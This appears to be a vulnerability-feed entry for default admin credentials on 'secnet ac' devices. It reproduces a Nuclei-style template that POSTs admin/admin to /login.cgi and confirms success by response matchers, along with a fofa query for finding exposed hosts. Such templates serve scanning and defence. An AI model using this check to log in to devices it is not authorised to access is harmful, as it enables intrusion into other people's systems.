secnet-ac-default-password: secnet ac - Default Admin Login

Date: 2025-08-01 | Affected software: secnet ac | PoC: public

Vulnerability description

Login to secnet ac with the default admin credentials was successful. fofa: secnet

PoC code [public]

id: secnet-ac-default-password

info:
  name: secnet ac - Default Admin Login
  author: ritikchaddha
  severity: high
  description: secnet ac default admin credentials were successful.
  reference:
    - https://bbs.secnet.cn/post/t-30
  metadata:
    max-request: 1
  tags: default-login,secnet,vuln

http:
  - raw:
      - |
        POST /login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "window.open('index.htm"

      - type: word
        part: header
        words:
          - "ac_userid={{username}},ac_passwd="

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f92b241502c844d5b0b44d7c547d2faf3cc8fa2018236f96bbff70492e5d6a1a0220698f670afd53f6840f8d940222a6c52ef5c61885a5d6c68ee81640c987a2e820:922c64590222798bb761d5b6d8e72950
